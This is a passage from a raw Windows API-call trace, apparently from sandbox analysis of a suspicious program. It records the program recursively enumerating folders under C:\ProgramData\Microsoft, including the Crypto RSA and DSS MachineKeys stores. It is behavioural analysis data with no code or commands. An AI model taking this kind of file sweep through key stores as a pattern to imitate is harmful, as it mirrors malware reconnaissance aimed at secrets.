out: lpFindFileData=0x3a0f44c) returned 1 [0111.914] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0111.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0111.915] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.915] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c220 [0111.915] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0111.915] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0 [0111.915] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.915] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30dbf30 | out: hHeap=0x1db0000) returned 1 [0111.915] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0 [0111.915] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0111.915] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0111.915] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0111.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0111.916] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.916] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0 [0111.916] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0111.916] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0111.916] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0111.916] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0111.917] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.917] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.917] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c220 [0111.917] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0111.917] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0 [0111.917] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.917] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30dbf30 | out: hHeap=0x1db0000) returned 1 [0111.917] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.917] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0xffffffff [0111.918] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30dbf30 | out: hHeap=0x1db0000) returned 1 [0111.919] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0 [0111.919] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0111.919] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0111.919] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0 [0111.919] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0111.919] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0111.920] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0111.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0111.920] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0111.920] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0111.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0111.922] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.922] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0111.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c220 [0112.050] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0112.050] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0112.050] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.051] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30dbf30 | out: hHeap=0x1db0000) returned 1 [0112.051] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0112.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c220 [0112.051] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0112.051] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0112.052] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.052] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30dbf30 | out: hHeap=0x1db0000) returned 1 [0112.052] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0 [0112.052] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.052] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0112.052] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0112.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0112.052] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0112.052] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0112.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c220 [0112.052] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0112.052] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0112.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0112.053] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0112.053] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0112.053] GetLastError () returned 0x12 [0112.053] SetLastError (dwErrCode=0x12) [0112.053] GetLastError () returned 0x12 [0112.053] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.053] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0112.053] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0112.053] GetLastError () returned 0x12 [0112.054] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.054] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.054] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0112.054] GetLastError () returned 0x12 [0112.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c220 [0112.054] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0112.054] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0112.054] GetLastError () returned 0x12 [0112.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 0x29c260 [0112.054] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0112.054] FindNextFileW (in: hFindFile=0x29c260, lpFindFileData=0x3a0ecc0 | out: lpFindFileData=0x3a0ecc0) returned 1 [0112.054] GetLastError () returned 0x12 [0112.054] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.054] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0112.054] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0112.054] GetLastError () returned 0x12 [0112.054] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.055] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.055] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0 [0112.055] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.055] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0112.055] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0 [0112.055] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.055] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.056] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0112.056] GetLastError () returned 0x12 [0112.056] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0112.056] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0112.056] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0 [0112.056] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.056] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.056] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0112.056] GetLastError () returned 0x12 [0112.056] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0112.057] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0112.057] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0112.057] GetLastError () returned 0x12 [0112.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0112.057] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0112.057] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0 [0112.057] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.057] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0112.057] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0 [0112.057] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.057] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.058] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0112.058] GetLastError () returned 0x12 [0112.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0112.059] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0112.059] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0112.059] GetLastError () returned 0x12 [0112.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0112.060] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0112.060] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0 [0112.060] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.060] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0112.060] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0 [0112.060] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.060] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.061] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x3a0f6d0 | out: lpFindFileData=0x3a0f6d0) returned 1 [0112.061] GetLastError () returned 0x12 [0112.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0112.061] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0112.061] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 1 [0112.062] GetLastError () returned 0x12 [0112.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0112.062] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0112.062] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 1 [0112.062] GetLastError () returned 0x12 [0112.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c220 [0112.063] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 1 [0112.063] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0 [0112.063] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.063] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.063] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0 [0112.063] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.063] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0112.063] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0 [0112.063] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.064] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0112.065] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.065] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Media Player\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0112.065] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.065] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0112.065] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.065] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0112.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0112.067] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.067] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0112.067] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.067] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.068] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0112.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0xffffffff [0112.070] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0112.070] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.070] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.071] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1a0 [0112.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c1e0 [0112.072] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.072] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0112.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0xffffffff [0112.072] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30abf18 | out: hHeap=0x1db0000) returned 1 [0112.072] FindClose (in: hFindFile=0x29c1a0 | out: hFindFile=0x29c1a0) returned 1 [0112.073] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0112.165] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.165] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0112.366] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.366] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0112.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x3a0ef44 | out: lpFindFileData=0x3a0ef44) returned 0x29c260 [0112.439] FindClose (in: hFindFile=0x29c260 | out: hFindFile=0x29c260) returned 1 [0112.440] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0112.440] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.440] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.440] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.440] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.441] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0112.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.444] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.444] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.444] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0112.444] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x3f90048 | out: hHeap=0x1db0000) returned 1 [0112.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*", lpFindFileData=0x3a0f44c | out: lpFindFileData=0x3a0f44c) returned 0x29c1e0 [0112.446] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.446] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.446] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.447] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.447] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x3a0f1c8 | out: lpFindFileData=0x3a0f1c8) returned 0x29c220 [0112.448] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0112.449] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30bbf20 | out: hHeap=0x1db0000) returned 1 [0112.449] FindFirstFileW (in: 